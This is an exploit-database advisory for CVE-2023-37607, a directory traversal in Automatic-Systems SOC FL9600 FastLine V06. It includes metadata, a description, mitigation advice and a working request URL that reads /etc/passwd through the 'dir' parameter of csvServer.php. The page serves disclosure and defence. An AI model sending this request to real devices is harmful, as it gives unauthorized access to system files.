header-logo
Suggest Exploit
vendor:
SOC FL9600 FastLine
by:
Mike Jankowski-Lorek, Marcin Kozlowski / Cqure
6.1
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: SOC FL9600 FastLine
Affected Version From: V06
Affected Version To: V06
Patch Exists: NO
Related CWE: CVE-2023-37607
CPE: a:automatic-systems:soc_fl9600_fastline:V06
Metasploit:
Other Scripts:
Platforms Tested:
2023

Directory Traversal in Automatic-Systems SOC FL9600 FastLine

The Automatic-Systems SOC FL9600 FastLine V06 allows an attacker to traverse directories by manipulating the 'dir' parameter in the 'csvServer.php' script, leading to unauthorized access to sensitive files such as '/etc/passwd'. This vulnerability has been assigned CVE-2023-37607.

Mitigation:

To mitigate this vulnerability, restrict user input by validating and sanitizing the 'dir' parameter input. Additionally, implement proper access controls to prevent unauthorized directory traversal.
Source

Exploit-DB raw data:

# Exploit Title: Automatic-Systems SOC FL9600 FastLine - Directory Transversal
# Google Dork: 
# Date: 12/9/2023
# Exploit Author: Mike Jankowski-Lorek, Marcin Kozlowski / Cqure
# Vendor Homepage: http://automatic-systems.com
# Software Link: 
# Version: V06
# Tested on: V06, VersionSVN = 28569_8a99acbd8d7ea09a57d5fbcb435da5427b3f6b8a
# CVE : CVE-2023-37607

Request URL: http://<host>/csvServer.php?getList=1&dir=../../../../etc/&file=passwd

Navigation

Suggest Exploit

Services By CQR